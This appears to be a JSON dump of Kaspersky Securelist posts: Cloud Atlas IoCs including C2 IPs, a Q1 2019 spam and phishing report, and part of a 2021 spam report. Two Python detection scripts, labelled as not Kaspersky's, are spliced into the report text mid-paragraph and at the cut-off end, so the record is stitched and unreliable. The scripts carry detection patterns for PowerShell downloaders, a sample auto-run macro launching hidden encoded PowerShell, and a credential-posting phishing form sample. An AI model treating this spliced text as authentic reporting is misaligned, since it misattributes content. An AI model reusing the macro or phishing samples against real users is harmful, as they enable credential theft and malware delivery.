More interestingly, this intrusion set hasn't changed its modular backdoor, even [five years after its discovery](<https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/>).\n\n## IoCs\n\n#### Some emails used by the attackers\n\n * infocentre.gov@mail.ru\n * middleeasteye@asia.com\n * simbf2019@mail.ru\n * world_overview@politician.com\n * infocentre.gov@bk.ru\n\n#### VBShower registry persistence\n\n * Key : HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\\\[a-f0-9A-F]{8}\n * Value : wscript //B \"%APPDATA%\\\\[A-Za-z]{5}.vbs\"\n\n#### VBShower paths\n\n * %APPDATA%\\\\[A-Za-z]{5}.vbs.dat\n * %APPDATA%\\\\[A-Za-z]{5}.vbs\n * %APPDATA%\\\\[A-Za-z]{5}.mds\n\n#### VBShower C2s\n\n * 176.31.59.232\n * 144.217.174.57", "cvss3": {}, "published": "2019-08-12T10:00:58", "type": "securelist", "title": "Recent Cloud Atlas activity", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "modified": "2019-08-12T10:00:58", "id": "SECURELIST:45427EE61DFCFA843ED5C3F7CAB026A1", "href": "https://securelist.com/recent-cloud-atlas-activity/92016/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T14:29:15", "description": "\n\n## Quarterly highlights\n\n### Valentine's Day\n\nAs per tradition, phishing timed to coincide with lovey-dovey day was aimed at swindling valuable confidential information out of starry-eyed users, such as bank card details. The topics exploited by cybercriminals ranged from online flower shops to dating sites.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15142701/Spam-report-Q1-2019-1.png>)\n\nBut most often, users were invited to order gifts for loved ones and buy medications such as Viagra. 
Clicking/tapping the link in such messages resulted in the victim's payment details being sent to the cybercriminals.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15142735/Spam-report-Q1-2019-2.png>)\n\n### New Apple products\n\nLate March saw the unveiling of Apple's latest products, which fraudsters were quick to pounce on, as usual. In the run-up to the event, the number of attempts to redirect users to scam websites imitating official Apple services rose significantly.\n\n_Growth in the number of attempts to redirect users to phishing Apple sites before the presentation _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143724/apple-en.png>)\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15142839/Spam-report-Q1-2019-4.png>)\n\n_Fake Apple ID login pages_\n\nScammers polluted Internet traffic with phishing emails seemingly from Apple to try to fool recipients into following a link and entering their login credentials on a fake Apple ID login page.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143511/Spam-report-Q1-2019-5.png>)\n\n### Fake technical support\n\nFake customer support emails are one of the most popular types of online fraud. The number of such messages has grown quite significantly of late. Links to fake technical support sites (accompanied by rave reviews) can be seen both on dedicated forums and social networks.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15142930/Spam-report-Q1-2019-6.png>)\n\n_Fake \"Kaspersky Lab support service\" accounts_\n\nAll these profiles that we detected in Q1 have one thing in common: they offer assistance in matters related to one or another company products, with the promise of specially trained, highly qualified staff supposedly ready and waiting to help. Needless to say, it is not free. 
Not only do users not have their issue resolved, they are likely to be defrauded as well.\n\n### New Instagram \"features\"\n\nLast year, we [wrote](<https://securelist.com/spam-and-phishing-in-q2-2018/87368/>) that phishers and other scammers had moved beyond mailing lists and into the realm of the popular social network Instagram. This trend continued, with fraudsters exploiting the service to the full \u2014 not only leaving links to phishing resources in comments, but also registering accounts, paying for advertising posts, and even enticing celebrities to distribute content.\n\nCybercriminal advertisers use the same methods to lure victims by promising products or services at what seems a great price.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143002/Spam-report-Q1-2019-7.png>)\n\nAs usual in such schemes, the \"buyer\" is asked for all sorts of information, from name to bank details. It goes without saying that all the user gets is their private data compromised.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143034/Spam-report-Q1-2019-8.png>)\n\n### Mailshot phishing\n\nIn Q1, we registered several phishing mailings in the form of automatic notifications seemingly on behalf of major services in charge of managing legitimate mailing lists. Scammers tried to force recipients to follow the phishing links under the pretext of verifying an account or updating payment information. 
Sometimes fake domains were used with names similar to real services, while other times hacked sites redirected the victim to a fake authorization form.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143105/Spam-report-Q1-2019-9.png>)\n\n### Financial spam through the ACH system\n\nIn Q1, we observed a large surge in spam mailings aimed at users of the Automated Clearing House (ACH), a US-based e-payment system that processes vast quantities of consumer and small-business transactions. These mailings consisted of fake notifications about the status of transfers supposedly made by ordinary users or firms. Such messages contained both malicious attachments (archives, documents) and links to download files infected with malware.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143129/Spam-report-Q1-2019-10.png>)\n\n### \"Dream job\" offers from spammers \n\nIn Q3, we [registered spam messages](<https://securelist.com/spam-and-phishing-in-q3-2018/88686/>) containing \"dream job\" offers. This quarter, we logged another major mailing topic: messages were sent supposedly on behalf of well-known companies sure to attract lots of potential applicants. Recipients were invited to register in the job search system for free by installing a special app on their computer to access the database. When trying to download the program from the \"cloud service,\" the user was shown a pop-up window titled DDoS Protection and a message with a link pointing to the site of an online recruitment company (the names of several popular recruitment agencies were used in the mailing). 
If the user followed it, a malicious DOC file containing Trojan.MSOffice.SAgent.gen was downloaded to their computer, which in turn downloaded Trojan-Banker.Win32.Gozi.bqr onto the victim's machine.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143159/Spam-report-Q1-2019-11.png>)\n\n### Ransomware and cryptocurrency\n\nAs we expected, cybercriminal interest in cryptocurrency did not wane. Spammers continue to wring cryptocurrency payments out of users by means of \"sextortion\" \u2014 a topic we [wrote about last year](<https://securelist.com/spam-and-phishing-in-2018/93453/>).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143235/Spam-report-Q1-2019-12.png>)\n\nIn Q1 2019, we uncovered a rather unusual scam mailing scheme whereby cybercriminals sent messages in the name of a CIA employee allegedly with access to a case file on the recipient for possession and distribution of digital pornographic materials involving minors.\n\nThe fictitious employee, whose name varied from message to message, claimed to have found the victim's details in the case file (which were actually harvested from social networks/online chats/forums, etc.). It was said to be part of an international operation to arrest more than 2,000 pedophilia suspects in 27 countries worldwide. However, the \"employee\" happened to know that the victim was a well-off individual with a reputation to protect \u2014 for which a payment of 10,000 dollars in bitcoin was demanded.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143314/Spam-report-Q1-2019-13.png>)\n\nPlaying on people's fear of private data being disclosed, the scammers employed the same tricks as last year, mentioning access to personal data, compromising pornographic materials, etc. 
But this time, to make the message more convincing and intimidating, a CIA officer was used as a bogeyman.\n\n### Malicious attacks on the corporate sector\n\nIn Q1, the [corporate sector of the Runet was hit by a malicious spam attack](<https://www.kaspersky.ru/blog/phishing-wave-shade/22251/>). The content imitated real business correspondence, and the messages themselves were seemingly from partners of the victim company.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143345/Spam-report-Q1-2019-14.png>)\n\nWe also observed malicious mailings aimed at stealing the financial information of international companies through distributing fake messages in the name of a US company allegedly providing information services. Besides the attachment, there was nothing at all in the message. The lack of text was seemingly intended to prompt the victim to open the attached document containing Trojan.MSOffice.Alien.gen, which then downloaded and installed Trojan-Banker.Win32.Trickster.gen on the computer.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143418/Spam-report-Q1-2019-15.png>)\n\n### Attacks on the banking sector\n\nBanks are firmly established as top phishing targets. Scammers try to make their fake messages as believable as possible by substituting legitimate domains into the sender's address, copying the layout of official emails, devising plausible pretexts, etc. In Q1, phishers exploited high-profile events to persuade victims of the legitimacy of the received message \u2014 for example, they inserted into the message body a phrase about the Christchurch terror attack. The attackers hoped that this, plus the name of a New Zealand bank as the sender, would add credibility to the message. 
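The two tricks this report keeps returning to, a From header that borrows a legitimate bank domain and links that point at a domain which merely resembles the real service, can both be caught at the mail gateway with a few header and URL checks. The Python below is an added example, not Kaspersky's code or tooling; the message, the brand list (`PROTECTED_BRANDS`), every host name in it, and the `triage`, `sender_findings` and `link_findings` functions are all constructed for the example.

```python
"""Triage of a message's sender and links against a list of protected brands.

Added example, not Kaspersky code. The message, the brand list and every
host name below are constructed for the example.
"""
import email
import email.utils
import re
from email import policy
from urllib.parse import urlparse

# Brand domains you actually own or bank with (assumption for the example).
PROTECTED_BRANDS = ["examplebank.co.nz"]

# Constructed message: the From header borrows the bank's domain, but the
# envelope sender and SPF/DKIM results disagree, and the "Login" link goes to a
# lookalike host; a second link uses a capital I for the l in the brand name.
SAMPLE_EML = b"""Return-Path: <bounce@mail-relay.example.net>
Authentication-Results: mx.example.com; spf=fail smtp.mailfrom=mail-relay.example.net; dkim=none
From: "Example Bank Security" <security@examplebank.co.nz>
To: customer@example.com
Subject: Important: update your account details
Content-Type: text/html; charset=utf-8

<html><body>
<p>Following recent events we have introduced new security features.</p>
<p><a href="https://examplebank-secure.co.nz.login-verify.xyz/update">Login</a> to update your details,
or visit <a href="https://exampIebank.co.nz/">our website</a>.</p>
</body></html>
"""


def levenshtein(a: str, b: str) -> int:
    """Edit distance, used to catch one-character lookalikes."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def domain_of(header_value) -> str:
    """Lower-cased domain of an address like 'Name <user@host>'."""
    _, addr = email.utils.parseaddr(str(header_value))
    return addr.rpartition("@")[2].lower()


def sender_findings(msg) -> list:
    """Header-only checks: From vs Return-Path domain, SPF and DKIM verdicts."""
    findings = []
    from_dom = domain_of(msg.get("From", ""))
    rp_dom = domain_of(msg.get("Return-Path", ""))
    if rp_dom and rp_dom != from_dom:
        findings.append(f"From domain {from_dom} differs from Return-Path domain {rp_dom}")
    auth = str(msg.get("Authentication-Results", ""))
    for mech in ("spf", "dkim"):
        m = re.search(rf"\b{mech}=(\w+)", auth)
        if m and m.group(1).lower() != "pass":
            findings.append(f"{mech} result is {m.group(1)}")
    return findings


def link_findings(body: str, brands) -> list:
    """Flag link hosts that embed or closely resemble a protected brand."""
    findings = []
    for url in re.findall(r"""https?://[^\s"'<>]+""", body):
        host = urlparse(url).hostname or ""  # .hostname lower-cases: exampIebank -> exampiebank
        for brand in brands:
            if host == brand or host.endswith("." + brand):
                continue  # genuine brand host or one of its subdomains
            label = brand.split(".")[0]
            if label in host:
                findings.append(f"{host}: brand name '{label}' embedded in an unrelated domain")
            elif levenshtein(host, brand) <= 2:
                findings.append(f"{host}: within edit distance 2 of {brand}")
    return findings


def triage(raw: bytes, brands=PROTECTED_BRANDS) -> dict:
    """Parse a raw message and combine the header and link checks into one verdict."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    body = msg.get_body(preferencelist=("html", "plain"))
    text = body.get_content() if body is not None else ""
    findings = sender_findings(msg) + link_findings(text, brands)
    return {"subject": str(msg["Subject"]), "findings": findings,
            "verdict": "suspicious" if findings else "clean"}


if __name__ == "__main__":
    result = triage(SAMPLE_EML)
    print(result["verdict"], "-", result["subject"])
    for finding in result["findings"]:
        print(" *", finding)
```

Run as a script it prints the findings for the constructed message. The brand check is deliberately conservative: a host is only accepted as genuine when it is the brand domain or a subdomain of it, and a host that embeds the brand name under a different registrable domain (the `examplebank-secure.co.nz.login-verify.xyz` pattern) is flagged regardless of edit distance. In production the Authentication-Results header must be the one your own gateway wrote, not one trusted from the message, since a sender can insert a forged one.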
The email itself stated that the bank had introduced some new security features that required an update of the account details to use.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/15143441/Spam-report-Q1-2019-16.png>)\n\nThe link took the user to a phishing site mimicking the login page of the New Zealand bank in question. All data entered on the site was transferred to the cybercriminals when the Login button was clicked/tapped.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143603/Spam-report-Q1-2019-17.png>)\n\n## Statistics: spam\n\n### Proportion of spam in mail traffic\n\n_Proportion of spam in global mail traffic, Q4 2018 \u2013 Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14144003/spam-world-en.png>)\n\nIn Q1 2019, the highest percentage of spam was recorded in March at 56.33%. The average percentage of spam in global mail traffic came to 55.97%, which is almost identical (+0.07 p.p.) to Q4 2018.\n\n_Proportion of spam in Runet mail traffic, Q4 2018 \u2013 Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143939/spam-russia-en.png>)\n\nPeak spam in traffic in the Russian segment of the Internet came in January (56.19%). The average value for the quarter was 55.48%, which is 2.01 p.p. higher than in Q4.\n\n### Sources of spam by country\n\n_Sources of spam by country, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143819/countries-source-en.png>)\n\nAs is customary, the top spam-originating countries were China (15.82%) and the US (12.64%); the other Top 3 regular, Germany, was down to fifth place in Q1 (5.86%), ceding third place to Russia (6.98%) and allowing Brazil (6.95%) to sneak into fourth. In sixth place came France (4.26%), followed by Argentina (3.42%), Poland (3.36%), and India (2.58%). 
The Top 10 is rounded off by Vietnam (2.18%).\n\n### Spam email size\n\n_Spam email size, Q4 2018 \u2013 Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143628/spam-size.png>)\n\nIn Q1 2019, the share of very small emails (up to 2 KB) in spam increased against Q4 2018 by 7.14 p.p. to 73.98%. The share of 2\u20135 KB messages fell to 8.27% (down 3.15 p.p.). 10\u201320 KB messages made up 5.11% of spam traffic, up 1.08 p.p. on Q4. The share of messages sized 20\u201350 KB amounted to 3.00% (0.32 p.p. growth against Q4 2018).\n\n### Malicious attachments: malware families\n\n_TOP 10 malicious families in mail traffic, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143654/families.png>)\n\nIn Q1 2019, the most common malware in mail traffic turned out to be Exploit.MSOffice.CVE-2017-11882, with a share of 7.73%. In second place was Backdoor.Win32.Androm (7.62%), and Worm.Win32.WBVB (4.80%) took third. Fourth position went to another exploit for Microsoft Office in the shape of Exploit.MSOffice.CVE-2018-0802 (2.81%), while Trojan-Spy.Win32.Noon (2.42%) rounded off the Top 5.\n\n### Countries targeted by malicious mailshots\n\n_Countries targeted by malicious mailshots, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143848/countries-victims-en.png>)\n\nFirst place in the Top 3 countries by number of Mail Anti-Virus triggers yet again went to Germany (11.88%). It is followed by Vietnam (6.24%) in second position and Russia (5.70%) in third.\n\n## Statistics: phishing\n\nIn Q1 2019, the Anti-Phishing system prevented **111,832,308** attempts to direct users to scam websites. 
**12.11%** of all Kaspersky Lab users worldwide experienced an attack.\n\n### Attack geography\n\nIn Q1 2019, as in the previous quarter, the country with the largest share of users attacked by phishers was Brazil with 21.66%, up 1.53 p.p.\n\n_Geography of phishing attacks, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/14143915/map-en.png>)\n\nIn second place up from eighth was Australia (17.20%), adding 2.42 p.p. but still 4.46 p.p. behind top-place Brazil. Spain rose one position to 16.96% (+0.87 p.p.), just above Portugal (16.86%) and Venezuela (16.72%) propping up the Top 5.\n\n**Country** | **%*** \n---|--- \nBrazil | 21.66 \nAustralia | 17.20 \nSpain | 16.96 \nPortugal | 16.81 \nVenezuela | 16.72 \nGreece | 15.86 \nAlbania | 15.11 \nEcuador | 14.99 \nRwanda | 14.89 \nGeorgia | 14.76 \n \n*Share of users on whose computers Anti-Phishing was triggered out of all Kaspersky Lab users in the country\n\n### Organizations under attack\n\n_The rating of attacks by phishers on different categories of organizations is based on detections by Kaspersky Lab's Anti-Phishing component. It is activated every time the user attempts to open a phishing page, either by clicking a link in an email or a social media message, or as a result of malware activity. When the component is triggered, a banner is displayed in the browser warning the user about a potential threat._\n\nThis quarter, the banking sector remains in first place by number of attacks \u2014 the share of attacks on credit organizations increased by 5.23 p.p. 
against Q4 last year to 25.78%.\n\n_Distribution of organizations subjected to phishing attacks by category, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/20091310/companies-en-1.png>)\n\nSecond place went to global Internet portals (19.82%), and payment systems \u2014 another category that includes financial institutions \u2014 finished third (17.33%).\n\n## Conclusion\n\nIn Q1 2019, the average share of spam in global mail traffic rose by **0.06** p.p. to **55.97**%, and the Anti-Phishing system prevented more than **111,832,308** redirects to phishing sites, up **35,220,650** in comparison with the previous reporting period.\n\nAs previously, scammers wasted no opportunity to exploit high-profile media events for their own purposes (Apple product launch, New Zealand terror attack). Sextortion has not gone away \u2014 on the contrary, to make such schemes more believable, cybercriminals have come up with new cover stories about the message senders.\n\nOn top of all that, attackers continue to use social networks to achieve their goals, and have launched advertising campaigns using celebrities to extend their reach.", "cvss3": {}, "published": "2019-05-15T10:00:23", "type": "securelist", "title": "Spam and phishing in Q1 2019", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "modified": "2019-05-15T10:00:23", "id": "SECURELIST:45BAFC60F3E2EFDD0D35C99D042559B4", "href": "https://securelist.com/spam-and-phishing-in-q1-2019/90795/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-14T15:27:23", "description": "\n\n## Figures of the year\n\nIn 2021:\n\n * 45.56% of e-mails were spam\n * 24.77% of spam was sent from Russia with another 14.12% from Germany\n * Our Mail Anti-Virus blocked 148 173 261 malicious attachments sent in e-mails\n * The most common malware family found in attachments were Agensla Trojans\n * Our Anti-Phishing system 
blocked 253 365 212 phishing links\n * Safe Messaging blocked 341 954 attempts to follow phishing links in messengers\n\n## Trends of the year\n\n### How to make an unprofitable investment with no return\n\nThe subject of investments gained significant relevance in 2021, with banks and other organizations actively promoting investment and brokerage accounts. Cybercriminals wanted in on this trend and tried to make their "investment projects" look as alluring as possible. Scammers used the names of successful individuals and well-known companies to attract attention and gain the trust of investors. That's how cybercriminals posing as Elon Musk or the Russian oil and gas company Gazprom Neft tricked Russian-speaking victims into parting with small sums of money in the hope of landing a pot of gold later. In some cases, they'd invite the "customer" to have a consultation with a specialist in order to come across as legit. The outcome would still be the same: the investor would receive nothing in return for giving their money to the scammers.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094031/Spam_report_2021_01.png>)\n\nSimilar schemes targeting English speakers were also intensively deployed online. Scammers encouraged investment in both abstract securities and more clearly outlined projects, such as oil production. In both cases, victims received nothing in return for their money.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094100/Spam_report_2021_02.png>)\n\nAnother trick was to pose as a major bank and invite victims to participate in investment projects. In some instances, scammers emphasized stability and the lack of risk involved for the investor, as well as the status of the company they were posing as. 
In order to make sure the investors didn't think the process sounded too good to be true, victims were invited to take an online test or fill out an application form which would ostensibly take some time to be "processed".\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094120/Spam_report_2021_03.png>)\n\n### Films and events "streamed" on fake sites: not seeing is believing!\n\nOnline streaming of hyped film premieres and highly anticipated sports events was repeatedly used to lure users in 2021. Websites offering free streaming of the new [Bond](<https://www.kaspersky.com/blog/bond-cybersecurity-in-craig-era/42733/>) movie or the latest Spider-Man film [appeared online](<https://threatpost.com/spider-man-movie-credit-card-harvesting/177146/>) shortly ahead of the actual release date, continuing to pop up until the eve of the official premiere. Scammers used various ploys to try and win the victim's trust. They used official advertisements and provided a synopsis of the film on the website.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094149/Spam_report_2021_04.png>)\n\nHowever, the promised free stream would be interrupted before the film even got going. Visitors to the site would be shown a snippet of a trailer or a title sequence from one of the major film studios, which could have absolutely nothing to do with the film being used as bait. Visitors would then be asked to register on the website in order to continue watching. The same outcome was observed when users tried to download or stream sports events or other content, the only difference was visitors might not be able to watch anything without registering. Either way the registration was no longer free. 
The registration fee would only be a symbolic figure according to the information provided on the website, but any amount of money could be debited once the user had entered their bank card details, which would immediately fall into the hands of attackers.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094211/Spam_report_2021_05.png>)\n\n### A special offer from cybercriminals: try your hand at spamming\n\nMore and more often, scam websites posing as large companies that promise huge cash prizes in return for completing a survey have begun setting out stricter criteria for those who want a chance to win. After answering a few basic questions, "prize winners" are required to share information about the prize draw with a set number of their contacts via a messaging app. Only then is the victim invited to pay a small "commission fee" to receive their prize. This means the person who completes the full task not only gives the scammers money, but also recommends the scam to people in their list of contacts. Meanwhile, friends see that the ad comes from someone they know rather than from an unknown number, which could give them a false sense of security, encouraging them to follow the link and part with their money in turn.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094234/Spam_report_2021_06.png>)\n\n### Hurry up and lose your account: phishing in the corporate sector\n\nThe main objective for scammers in an attack on an organization remained getting hold of corporate account credentials. The messages that cybercriminals sent to corporate e-mail addresses were increasingly disguised as business correspondence or notifications about work documents that required the recipient's attention. The aim was to trick the victim into following the link to a phishing page for entering login details. 
That's why these e-mails would contain a link to a document, file, payment request, etc., where some sort of urgent action supposedly needed to be taken.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094310/Spam_report_2021_07.png>)\n\nThe fake notification would often concern some undelivered messages. They needed to be accessed via some sort of "email Portal" or another similar resource.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094341/Spam_report_2021_08.png>)\n\nAnother noticeable phishing trend targeting the corporate sector was to exploit popular cloud services as bait. Fake notifications about meetings in Microsoft Teams or a message about important documents sent via SharePoint for salary payment approval aimed to lower the recipient's guard and prompt them to enter the username and password for their corporate account.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094433/Spam_report_2021_09.png>)\n\n### COVID-19\n\n#### Scams\n\nThe subject of COVID-19 which dominated newsfeeds throughout the entire year was exploited by scammers in various schemes. In particular, attackers continued sending out messages about compensation and subsidies related to restrictions imposed to combat the pandemic, as this issue remained top of the agenda. The e-mails contained references to laws, specific measures imposed and the names of governmental organizations to make them sound more convincing. To receive the money, the recipient supposedly just needed to pay a small commission fee to cover the cost of the transfer. In reality, the scammers disappeared after receiving their requested commission along with the victim's bank card details.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094510/Spam_report_2021_10.png>)\n\nThe sale of fake COVID vaccination passes and QR codes became another source of income for cybercriminals. 
The fraudsters emphasized how quickly they could produce forged documents and personalized QR codes. These transactions are dangerous in that, on the one hand, the consequences can be criminal charges in some countries, and on the other hand, scammers can easily trick the customer. There's no guarantee that the code they're selling will work. Another risk is that the buyer needs to reveal sensitive personal information to the dealer peddling the certs in order to make the transaction.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094550/Spam_report_2021_11.png>)\n\n#### The corporate sector\n\nCOVID-19 remained a relevant topic in phishing e-mails targeting the business sector. One of the main objectives in these mailing operations was to convince recipients to click a link leading to a fake login page and enter the username and password for their corporate account. Phishers used various ploys related to COVID-19. In particular, we detected notifications about compensation allocated by the government to employees of certain companies. All they needed to do in order to avail of this promised support was to "confirm" their e-mail address by logging in to their account on the scam website.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094621/Spam_report_2021_12.png>)\n\nAnother malicious mailshot utilized e-mails with an attached HTML file called "Covid Test Result". 
Recipients who tried to open the file were taken to a scam website where they were prompted to enter the username and password for their Microsoft account.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094648/Spam_report_2021_13.png>)\n\nThe "important message about vaccination" which supposedly lay unread in a recipient's inbox also contained a link to a page belonging to attackers requesting corporate account details.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094709/Spam_report_2021_14.png>)\n\nAnother type of attack deployed e-mails with malicious attachments. Shocking news, such as immediate dismissal from work accompanied by the need to take urgent action and read a "2 months salary receipt" were intended to make the recipient open the attachment with the malicious object as quickly as possible.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094735/Spam_report_2021_15.png>)\n\n#### COVID-19 vaccination\n\nWhile authorities in various countries gradually rolled out vaccination programs for their citizens, cybercriminals exploited people's desire to protect themselves from the virus by getting vaccinated as soon as possible. For instance, some UK residents received an e-mail claiming to be from the country's National Health Service. In it, the recipient was invited to be vaccinated, having first confirmed their participation in the program by clicking on the link. In another mailing, scammers emphasized that only people over the age of 65 had the opportunity to get vaccinated.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094800/Spam_report_2021_16.png>)\n\nIn both cases, a form had to be filled out with personal data to make a vaccination appointment; and in the former case, the phishers also asked for bank card details. 
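Both attachment types this section describes, the HTML file that forwards the victim to a credential page (or hosts the login form itself) and the Office document whose macro launches PowerShell, can be triaged statically before anyone opens them. The Python below is an added example, not Kaspersky's code; `scan_html_attachment`, `scan_vba_source` and every sample input (the HTML files, the VBA text, all host names) are constructed for it. The VBA scanner assumes the macro source has already been extracted from the document (for example with olevba) and looks only at that text.

```python
"""Static triage of the two attachment types described above (added example, not
Kaspersky code): an HTML file that forwards the victim to a credential page or
hosts the login form itself, and a macro document that launches PowerShell.
All sample inputs and host names are constructed."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse


class _AttachmentParser(HTMLParser):
    """Collect forms (with input types) and redirect targets from an HTML attachment."""

    def __init__(self):
        super().__init__()
        self.forms = []       # [{"action": str, "inputs": [input types]}]
        self.redirects = []   # targets of <meta refresh> and script location changes
        self._script = None   # text buffer while inside <script>

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "form":
            self.forms.append({"action": a.get("action", ""), "inputs": []})
        elif tag == "input" and self.forms:
            self.forms[-1]["inputs"].append((a.get("type") or "text").lower())
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            m = re.search(r"url\s*=\s*['\"]?([^'\"\s;]+)", a.get("content", ""), re.I)
            if m:
                self.redirects.append(m.group(1))
        elif tag == "script":
            self._script = []

    def handle_data(self, data):
        if self._script is not None:
            self._script.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script is not None:
            js, self._script = "".join(self._script), None
            # location = "..."; location.href = "..."; location.replace("...") / assign("...")
            pat = r"""location(?:\.href)?\s*=\s*['"]([^'"]+)['"]|location\.(?:replace|assign)\(\s*['"]([^'"]+)['"]"""
            for m in re.finditer(pat, js):
                self.redirects.append(m.group(1) or m.group(2))


def scan_html_attachment(html: str, trusted_hosts=()) -> list:
    """Findings for one HTML attachment; an empty list means nothing suspicious."""
    p = _AttachmentParser()
    p.feed(html)
    p.close()
    findings = []
    for form in p.forms:
        if "password" in form["inputs"]:   # a test result never needs a password
            host = urlparse(form["action"]).hostname or "the attachment itself"
            findings.append(f"password form posts to {host}")
    for url in p.redirects:
        host = urlparse(url).hostname
        if host and host not in trusted_hosts:
            findings.append(f"redirects to {host}")
    return findings


# Macro entry points that run without a click, and the shell/download primitives a
# downloader macro needs. Assumes the VBA source was already extracted (e.g. with olevba).
AUTOEXEC = re.compile(r"\b(?:AutoOpen|Auto_Open|Document_Open|Workbook_Open|AutoExec)\b", re.I)
EXEC_PRIMITIVES = re.compile(
    r"\bShell\b|WScript\.Shell|\bpowershell\b|-e(?:nc|ncodedcommand)\b|DownloadString"
    r"|DownloadFile|URLDownloadToFile|XMLHTTP|\bCreateObject\(",
    re.I,
)


def scan_vba_source(vba: str) -> list:
    """Flag an auto-executing macro that reaches for a shell or a downloader."""
    auto = AUTOEXEC.findall(vba)
    hits = sorted({h.lower() for h in EXEC_PRIMITIVES.findall(vba)})
    if auto and hits:
        return [f"auto-exec entry point {auto[0]} with {', '.join(hits)}"]
    if hits:
        return ["execution primitives without auto-exec: " + ", ".join(hits)]
    return []


# Constructed samples (invented hosts; the -enc blob is a placeholder, not a payload).
SAMPLE_REDIRECT = ('<html><head><meta http-equiv="refresh" content="0; '
                   'url=https://login-microsoft.verify-result.example/auth"></head>'
                   '<body>Loading your test result...</body></html>')
SAMPLE_FORM = """<html><body>
<form method="post" action="https://collect.example/post.php">
  <input name="email"><input type="password" name="pw">
  <input type="submit" value="View result">
</form>
<script>setTimeout(function () { window.location.href = "https://collect.example/done"; }, 3000);</script>
</body></html>"""
SAMPLE_BENIGN = "<html><body><h1>Result: negative</h1><p>No further action needed.</p></body></html>"
SAMPLE_VBA = '''Sub Document_Open()
    Set sh = CreateObject("WScript.Shell")
    sh.Run "powershell -w hidden -enc QQBCAEMA", 0
End Sub
'''

if __name__ == "__main__":
    for name, doc in (("redirect", SAMPLE_REDIRECT), ("form", SAMPLE_FORM), ("benign", SAMPLE_BENIGN)):
        print(name, scan_html_attachment(doc))
    print("vba", scan_vba_source(SAMPLE_VBA))
```

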